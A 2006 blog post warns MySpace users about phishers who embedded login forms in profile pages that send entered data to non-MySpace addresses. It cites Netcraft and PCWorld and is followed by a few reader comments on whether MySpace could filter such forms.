I just came across an post from Netcraft that describes a very worrying situation over at MySpace. Turns out MySpace is allowing so much design flexibility on their pages that Hackers have discovered a way using Phishing techniques to havest your personal data without even the wisest of users realising they have just been robbed.
Check out these pictures courtesy of Netcraft’s news blog.
The red box below shows where your entered data goes if you would have submitted it. Notice how the address isn’t a myspace.com address any longer. Very worrying because most Anti-Phishing products wouldn’t pick up this kind of fraud, at least not yet.
If you want to get the full story check out Netcraft’s post MySpace Accounts Compromised by Phishers. I haven’t found out yet if Myspace has taken the site down but one of their users has been speaking out and finding other Phishing examples.
Remember no matter where you are always be careful. Be cynical, and be cautious.
Ping THIS!
| 
{ 4 comments… read them below or add one }
Roger Kondrat 11.02.06 at 12:01 pm
Quick little update:
I just found a related PCWorld article - Phishing attack targets myspace users
Roger Kondrat 11.02.06 at 12:01 pm
Quick little update:
I just found a related PCWorld article - Phishing attack targets myspace users
Marcus Greenwood 11.02.06 at 12:33 pm
i don’t really think this is the fault of myspace. any site which allows users to modify the HTML is suceptible to this kind of phishing attack. not sure quite what they’d be able to get out of taking control of someone’s myspace account??
it may be possible for them to filter out code which allows a form to be created which posts to another site and i’d be suprised if they don’t do something like this soon.
Marcus Greenwood 11.02.06 at 12:33 pm
i don't really think this is the fault of myspace. any site which allows users to modify the HTML is suceptible to this kind of phishing attack. not sure quite what they'd be able to get out of taking control of someone's myspace account??
it may be possible for them to filter out code which allows a form to be created which posts to another site and i'd be suprised if they don't do something like this soon.